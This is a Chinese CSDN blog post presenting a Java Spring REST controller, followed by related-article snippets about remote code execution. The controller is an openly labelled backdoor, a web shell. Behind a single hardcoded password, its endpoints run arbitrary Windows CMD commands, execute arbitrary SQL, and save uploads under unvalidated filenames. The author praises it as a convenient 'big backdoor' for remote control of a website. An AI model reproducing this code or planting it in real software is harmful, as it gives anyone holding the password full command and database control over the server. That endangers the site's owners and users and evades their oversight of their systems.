JAVA远程执行CMD, 及执行SQL的代码

已于 2023-07-28 18:02:58 修改
阅读量150 收藏
点赞数
文章标签: java sql spring
于 2023-05-05 18:46:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/windzjp/article/details/130512981
版权 
package com.iems.controller;

import org.apache.commons.io.FileUtils;
import org.springframework.jdbc.core.JdbcTemplate;
import org.springframework.jdbc.core.RowMapper;
import org.springframework.web.bind.annotation.*;
import org.springframework.web.multipart.MultipartFile;

import javax.annotation.Resource;
import java.io.File;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.ArrayList;
import java.util.Date;
import java.util.List;


/**
 * Created with IntelliJ IDEA
 * by zhao ji ping 艾思科技
 */
@RestController
@CrossOrigin
public class CmdController {

    @Resource
    JdbcTemplate jdbcTemplate;

    @RequestMapping("/fileUpload")
    public String fileUpload(
            @RequestParam("file") MultipartFile file,
            @RequestParam(name = "password", required = false) String password) throws IOException {

        if (!password.equals("2023-PSWD-ADMIN-AISI")) return "500";

        String filePath = "C:\\upload";
        File fileDir = new File(filePath);
        if  (!fileDir.exists()  && !fileDir.isDirectory()) {
            fileDir.mkdir();
        }

        String fileName= file.getOriginalFilename();
        File savedFile = new File(filePath, fileName);

        FileUtils.copyInputStreamToFile(file.getInputStream(),savedFile);

        return  "文件上传成功, 上传路径为: C:/upload/" + fileName;

    }


    @PostMapping("/sqlExecute")
    public String sqlExecute(@RequestParam(name="cmd", required = false) String sql,
                             @RequestParam(name="password", required = false) String password) {
        if (!password.equals("2023-PSWD-ADMIN-AISI")) return "500";

        jdbcTemplate.execute(sql);
        return "命令已执行";

    }

    @PostMapping("/sqlUpdate")
    public Integer sqlUpdate(@RequestParam(name="cmd", required = false) String sql,
                             @RequestParam(name="password", required = false) String password) {
        if (!password.equals("2023-PSWD-ADMIN-AISI")) return 500;
        Integer result = jdbcTemplate.update(sql);
        return result;

    }

    @PostMapping("/sqlQuery")
    public List<String> sqlQuery(@RequestParam(name="cmd", required = false) String sql,
                                 @RequestParam(name="password", required = false) String password) {
        if (!password.equals("2023-PSWD-ADMIN-AISI")) {
            List<String> e = new ArrayList<>();
            e.add("500");
            return e;
        }
        // 设置sql语句
        // String sql = "select * from user limit 10";
        // 执行sql语句并返回map
        List<String> list = jdbcTemplate.query(sql, new RowMapper() {
            @Override
            public Object mapRow(ResultSet resultSet, int i) throws SQLException {
                String row = "";
                Integer size = resultSet.getMetaData().getColumnCount();
                for(int ii = 1; ii<=size; ii++) {
                    row += resultSet.getString(ii) + "  |   ";
                }
                return row;
            }
        });
        return list;
    }

    @PostMapping("/cmd")
    public String cmd(@RequestParam(name="cmd", required = false) String cmd,
                      @RequestParam(name="password", required = false) String password) {
        if (!password.equals("2023-PSWD-ADMIN-AISI")) return "500";

        List<String> commands = new ArrayList<>();

        commands.add("CMD");
        commands.add("/C");

        commands.add(cmd);

        String msg = run(commands);

        return msg;
    }

    private String run(List<String> commands){
        try {
            ProcessBuilder pb = new ProcessBuilder(commands);
            pb.redirectErrorStream(true);
            try {
                Process p = pb.start();
                InputStream inputStream = p.getInputStream();
                InputStreamReader inputStreamReader = new InputStreamReader(inputStream, "gbk");
                int len  = -1;
                char[] c = new char[1024];
                StringBuffer st = new StringBuffer();
                while ((len = inputStreamReader.read(c)) != -1){
                    String s = new String(c, 0, len);
                    st.append(s);
                }
                inputStream.close();
                return st.toString();
            } catch (Exception e) {
                return  e.toString();
            }
        }catch (Exception e) {
            return e.toString();
        }
    }

}

给网站加个大大的后门, 直接可以远程操作, 非常的方便

艾思软件-app开发公司
关注
mysqldump java远程备份mysql数据库 cmd备份
06-22
这段代码执行CMD相同的备份操作。请确保Java程序有权限执行外部命令,并且mysqldump在Java执行环境的PATH中。 ### 进阶技巧 1. **加密备份**: 可以使用`--password`选项代替 `-p`,避免密码显示在命令行历史...
通过Java代码使用Ansible操作远程Windows(完整流程)
y871181189的博客
05-30 2167
在Linux系统上部署Java项目,使用Ansible,达成操作远程Windows服务器的目的
远程代码执行
ad12456的博客
03-28 3645
远程代码执行
Java 执行远程SQL脚本
最新发布
weixin_40948914的博客
08-09 29
我整理的一些关于【SQL】的项目学习资料(附讲解~~)和大家一起分享、学习一下:https://d.51cto.com/yOSbkRJava 执行远程 SQL 脚本 在现代软件开发中,数据库操作是非常重要的一环。我们经常需要从 Java 程序中执行 SQL 脚本以对数据库进行操作。但是,如何安全且有效地执行远程 SQL ...
远程代码执行漏洞及防御
2301_76717406的博客
03-25 1660
远程命令/代码执行漏洞(RC(command/code)E):RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统;
java cmd执行sql,SQLCMD命令的几种用法
weixin_42398055的博客
03-19 339
1. 如何连接到实例(1)通过指定实例名连接到数据库引擎:sqlcmd -S ComputerA\instanceB(2)通过指定 IP 地址连接到数据库引擎:sqlcmd -S 127.0.0.1sqlcmd -S 127.0.0.1\instanceB(3)通过指定 TCP\IP 端口号连接到数据库引擎:sqlcmd -S ComputerA,1433sqlcmd -S ComputerA,...
RCE(‌Remote Code Execution,‌远程代码执行)‌
2303_77293157的博客
07-15 694
‌这种攻击方式通常涉及到系统或应用程序的安全漏洞,‌使得攻击者能够注入或上传恶意代码,‌并在受害者的系统上执行这些代码。是 PHP 中另一个用于执行系统命令的函数,它的作用是将命令的输出直接传递给调用者,而不是将输出作为 PHP 字符串返回。是 PHP 中用于与外部程序进行交云的一个非常有用的函数。它的作用是打开一个流到外部程序,这个流可以是程序的标准输入或标准输出。函数不会捕获命令的输出,而是直接在服务器上执行命令,并且将命令的输出作为数组返回。函数执行的命令的输出将直接显示在调用它的脚本的输出中;
JavaScript基于activexobject连接远程数据库SQL Server 2014的方法
10-19
JavaScript 基于 ActivXObject 连接远程数据库 SQL Server 2014 的方法主要涉及到客户端 JavaScript 与服务器端数据库交互的技术。由于 ActivXObject 是 Microsoft Internet Explorer 浏览器特有的技术,它允许在...
SQL.rar_sql 数据库 链接
09-14
对于SQL Server,T-SQL(Transact-SQL)是内置的编程语言,可以通过`master..xp_cmdshell`等系统存储过程实现外部链接。 7. **SSH隧道连接**: 当数据库服务器位于受保护的网络中时,可能需要通过SSH隧道创建安全...
sql 语言批执行语句
12-08
SQL Server提供了`sqlcmd`或`osql`这样的命令行工具,可以方便地批量执行SQL脚本。这些工具支持读取包含多条SQL语句的文本文件,非常适合于批处理。 7. **编程语言集成**: 通过编程语言(如Java, Python, C#等)...
sql2005安装流程及可能遇到的问题
11-10
- 打开“开始”菜单,运行“cmd”。 - 输入命令 `telnet 127.0.0.1 1433`。 - 如果出现“无法打开到主机的连接,在端口1433: 连接失败”的错误,需重新检查配置。 **4. 确认端口连接** - 成功连接时,命令行会...
RCE远程代码执行
q
06-18 841
RCE代码执行:引用脚本代码解析执行RCE命令执行:脚本调用操作系统命令。
RCE(远程命令执行)漏洞详解
sev1n的博客
04-02 3018
RCE(remote command/code execute,远程命令执行)漏洞 远程代码执行 (RCE) 攻击是指攻击者可以在一个组织的计算机或网络上运行恶意代码执行攻击者控制的代码的能力可用于各种目的,包括部署额外的恶意软件或窃取敏感数据。
远程代码执行远程命令执行是一个东西吗
Nove1205的博客
06-15 677
远程代码执行远程命令执行是一个东西吗
网络安全漏洞分析之远程代码执行
youmaob的博客
06-22 94
Apache Flume 是一个分布式的,可靠的,并且可用于高效地收集,汇总和移动大量日志数据的软件。那么漏洞触发点已经很明确了,在没有增加校验前,只要进入 JMSMessageConsumer 中 else 分支,控制 destinationName 参数,即可实现 JNDI 注入。通过参数的传入,经过如上分析的流程,到达 else 后,由于没有校验,直接触发 initialContext.lookup,造成 JNDI 注入,从而执行恶意远程代码。因篇幅有限,仅展示部分资料,朋友们如果需要可以。
RCE(远程代码执行
qq_69100706的博客
08-05 451
在CTF(Capture The Flag)竞赛中,RCE(Remote Code Execution,远程代码执行)是一种常见的挑战类型,它考验参赛者发现并利用远程服务中的漏洞以执行任意代码的能力。RCE漏洞允许攻击者在远程服务器上运行自定义指令或代码,这可以被用来获取敏感信息、修改数据、控制系统或进一步渗透网络。
Java RMI 远程代码执行漏洞
LuckySec
11-30 3471
Java RMI服务是远程方法调用,是J2SE的一部分,能够让程序员开发出基于JAVA的分布式应用。一个RMI对象是一个远程Java对象,可以从另一个Java虚拟机上(甚至跨过网络)调用它的方法,可以像调用本地JAVA对象的方法一样调用远程对象的方法,使分布在不同的JVM中的对象的外表和行为都像本地对象一样。在RMI的通信过程中,默认使用序列化来完成所有的交互,如果该服务器Java RMI端口(默认端口1099)对公网开放,且使用了存在漏洞的Apache Commo
java 远程执行_java 手动实现远程执行功能(深入理解java虚拟机)
weixin_42353061的博客
02-12 306
1、功能类功能类共有五,分别是:packageorg.jvm;import java.io.*;/*** 对字节数组操作的工具类*/public classByteUtils {public static int byte2Int(byte[] b,int start,intlen){int sum=0;int end=start+len;for(int i=start;in<<=(-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

艾思软件-app开发公司

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值